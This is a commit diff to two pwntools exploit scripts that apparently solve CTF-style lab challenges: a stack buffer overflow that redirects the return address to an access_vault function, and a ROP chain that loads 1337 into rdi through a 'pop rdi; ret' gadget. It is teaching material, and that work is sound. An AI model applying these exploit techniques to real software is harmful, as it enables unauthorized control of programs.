Skip to content

Commit c74d7be

Browse files
qhdwightqhdwight
committed
Add more comments
1 parent 41492ed commit c74d7be

File tree

2 files changed

+16
-8
lines changed

2 files changed

+16
-8
lines changed

buffer_overflow/solve.py

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,6 @@
44

55
import argparse
66

7-
ACCESS_VAULT_FUNCTION_ADDR = 0x0000000000401176
8-
97
if __name__ == '__main__':
108
parser = argparse.ArgumentParser()
119
parser.add_argument('--debug', action='store_true')
@@ -15,6 +13,8 @@
1513
# Tell pwntools our target process to automate future functions
1614
elf = context.binary = ELF('buffer_overflow')
1715

16+
access_vault_function_addr = elf.symbols['access_vault']
17+
1818
if args.debug:
1919
io = gdb.debug(context.binary.path, '''
2020
set follow-fork-mode child
@@ -53,7 +53,7 @@
5353
# We only execute one other function which doesn't need it
5454
saved_ebp = b'B' * 0x8
5555
# We have to pack the address properly (endianess!)
56-
redirect_addr = p64(ACCESS_VAULT_FUNCTION_ADDR)
56+
redirect_addr = p64(access_vault_function_addr)
5757
# Craft the final bytes payload
5858
payload = dummy_data + saved_ebp + redirect_addr
5959

rop_chaining/solve.py

Lines changed: 13 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -11,11 +11,14 @@
1111

1212
args = parser.parse_args()
1313

14-
POP_EDI_GADGET_ADDR = 0x0000000000401253
15-
ACCESS_VAULT_FUNCTION_ADDR = 0x0000000000401176
16-
1714
elf = context.binary = ELF('rop_chaining')
1815

16+
rop = ROP(elf)
17+
18+
# Address can also be found by running 'ropper --file rop_chaining --search "pop rdi; ret"'
19+
pop_rdi_gadget_addr = rop.find_gadget(['pop rdi', 'ret'])[0]
20+
access_vault_function_addr = elf.symbols['access_vault']
21+
1922
if args.debug:
2023
io = gdb.debug(context.binary.path, '''
2124
set follow-fork-mode child
@@ -27,8 +30,13 @@
2730

2831
io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
2932

30-
payload = (b'A' * 0x10 + b'B' * 0x8 +
31-
p64(POP_EDI_GADGET_ADDR) + p64(1337) + p64(ACCESS_VAULT_FUNCTION_ADDR))
33+
# Padding to get to return address
34+
padding = b'A' * 0x10 + b'B' * 0x8
35+
# Pop 1337 into rdi register
36+
pop_1337_payload = p64(pop_rdi_gadget_addr) + p64(1337)
37+
# Notice last chain is calling the target access_vault function
38+
# Most 64-bit calling conventions place the first argument in rdi
39+
payload = padding + pop_1337_payload + p64(access_vault_function_addr)
3240

3341
io.send(payload)
3442

0 commit comments

Comments
 (0)